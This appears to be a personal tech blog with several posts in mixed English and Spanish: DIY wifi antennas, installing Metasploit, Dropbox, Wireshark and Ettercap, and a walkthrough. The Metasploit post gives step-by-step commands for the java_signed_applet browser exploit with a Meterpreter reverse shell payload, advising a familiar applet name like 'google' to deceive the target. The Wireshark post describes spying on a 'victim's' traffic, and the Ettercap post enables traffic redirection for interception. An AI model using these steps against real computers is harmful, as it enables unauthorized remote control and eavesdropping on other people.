Wednesday, January 16, 2013


Hi, I've been busy so I haven't writen in so much time. In this article I'll explain how create antennas for winning wifi-signal.

Antenna 2-pringles

The first one is called "cantenna". Consist on 2 cans of potatoes connected. 

We need:

-2 cans of pringles 165g
-Adhesive tape
-16 washers (3mm dm in) (1. picture)
-32 washers (6mm dm ou) (2.pic)
-32 screw (3mm dm in)
-A screwed bar (50cm 3mm dm)

*Excp: Yo can add 2 c-discs, in that case yo have to recover them with silver paper or Al-Adhesive tape:
-Adhesive tape (aluminium)
-Two c-discs.

1. washer
2. washer

We have to mark the screwed bar each 3 cm.
We have tu cut 3 circles, 1 for the base, another for the middle, and the last for the cover.
We have to locate them:
screw-tiny washer-big washer-tiny washer-screw.

Yo have to made a tiny hole to introduce the wifi-pen.

Antena escurridor de aceite.

Para mí esta es la mejor y con la que mejores resultados he obtenido. Y es la más sencilla de hacer.
-Rosca y 2 tuercas de manguera de jardín

Dm=30 cm.
You have to make a hole in the middle.
Partimos por la mitad la rosca para meter el cable y lo ponemos en el agujero del colador.
Metemos con cuidado las tuercas y dejamos que el extremo de cable hembra sobresalga un poco pero sin llegar a pasarla y enroscamos bien para que se quede fijo. La otra rosca tiene qe pasar entera.



We open a shell and type:

sudo msfconsole

This program uses exploits for cracking another computer, we will use a virtual machine or in my case another computer of mine.

We will use this exploit:

use exploit/multi/browser/java_signed_applet

This exploit uses java, that is present in mostly of the web apps.
We have to name the plugin:

set APPLETNAME google

You can name the applet as you wish, but try to put something well-known
Now you have to create the server, the server is our IP. The client will conect to that direction. If you don't know your Ip, open a shell and type:

sudo ifconfig

I'm conected to the interface wlan0, so my IP is
We come back to the metasploit shell and type:


Now the port, the port is usually 80:

set SRVPORT 80

The route:


And now we run the payload:

set payload windows/meterpreter/reverse_tcp

Now we have to put the local host, that's our IP too:


Now run the exploit:


And that's all, in the virtual machine type the IP in your browser.

Then java will appear:

Then in our computer, and in the metasploit shell will appear
Meterpreter opened in session 1 

Or something like that, so we have to type:

sessions -i 1

The number is the id of the session, it can be 1, 2 or another number. Now you are de admin in that computer, you can use the orders of windows:

shutdown, reboot, regshot....

There are a lot of orders, so you have to try all of them.

I have learned all with google and watching videos. I'm not responsible of what you do, with this tutorial.

Install metasploit

I'm presenting to you metasploit, a program which is based in "exploits", tiny programs that allow us to do interesting things.

We have to download it:

We have to download our version.

Then we open a shell and then we install it. 

In the shell we write for the root access and execution:

sudo chmod +x 

Then install:

sudo ./ 

We have to wait a while, and maybe we would have to update.

Then we have to create an account.
Before we have to install some dependencies:

sudo apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby
irb ri rubygems subversion build-essential ruby-dev libpcap-dev

Then we type:

sudo msfconsole

It will take a while so be patient. 


I'll talk about dropbox, it's a usefull tool which is being used in some colleges. If you want to install it, you have to do the following.

We must write in a shell:

sudo apt-get install dropbox

I prefer downloading it from the webpage. It's better and the program won't bother us with the upgrades. With this link, you'll win free storage, as I do. 

Monday, April 9, 2012


In this section, I'll show you how to use wireshark.
First of all install wireshark
When you have installed wireshark, you've to open it throw a terminal, with:
sudo wireshark
In this step, we'll make the capture, with the selected interface, if you prefer to not to complicate yourself, capture in all of them.
Then you'll see something like this:

If you want to see what is doing your victim, or what webpages is visiting type as a filter http.
If you take a look, below the coloured window, there is a window with signs, numbers, letters...; that's the protection of this webpage, if it desn' have protection you can manipulate this webpage, for example tuenti, facebook...
You can do lots of things with that program, like check if someone is using a email cient, a chat... WEP injection....

This is only for learning, I'm not responsible if someone uses it for bad uses.

Thursday, March 29, 2012

Take care

Sometimes, in ubuntu, when you are "root" and you're working with some files, we can delete by accident a very important folder or file. I'll explain how can we avoid that.
First of all, if you're working with the terminal, you have to be very careful with the names of the files, cause if you write something wrong and you're deleting some files ought to a old installation, because if you type the name incorrectly, you can delete another file. 
Also be careful when you copy or move files, because the most important is to type the route of the file or folder and where do you want to copy or move the file.

Saturday, January 7, 2012

Install Ettercap

Here I'll show you how to install ettercap, a program to manage the connections on your network.

First of all, we must install:
sudo apt-get install build-essential 
sudo apt-get install linux-headers-`uname -r`

sudo apt-get install libpcre3-dev 
sudo apt-get install libpcap0.8-dev 
sudo apt-get install libnet1-dev 
sudo apt-get install openssl
sudo apt-get install libssl-dev 
sudo apt-get install ncurses-bin 
sudo apt-get install libncurses5-dev 
sudo apt-get install libnet6-1.3-dev 
sudo apt-get install libpthread-stubs0-dev 
sudo apt-get install zlib1g-dev 
sudo apt-get install libltdl-dev 
sudo apt-get install pango-graphite
sudo apt-get install pkg-config 
sudo apt-get install libpango1.0-dev 
sudo apt-get install libatk1.0-dev 
sudo apt-get install libgtk2.0-dev 

sudo apt-get install autoconf
sudo apt-get install byacc

**: If you can't install one of them, look for it in ppa manager. How to get y-ppa-manager.
And finally:

sudo apt-get install ettercap-gtk ettercap-common

When you have installed it, type on the terminal:
sudo gedit /etc/etter.conf

And we look for something like "iptables" and delete the #.

It will be like:

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

And now open the program:

sudo ettercap -C   (text-mode)
sudo ettercap --gtk (graphic-mode)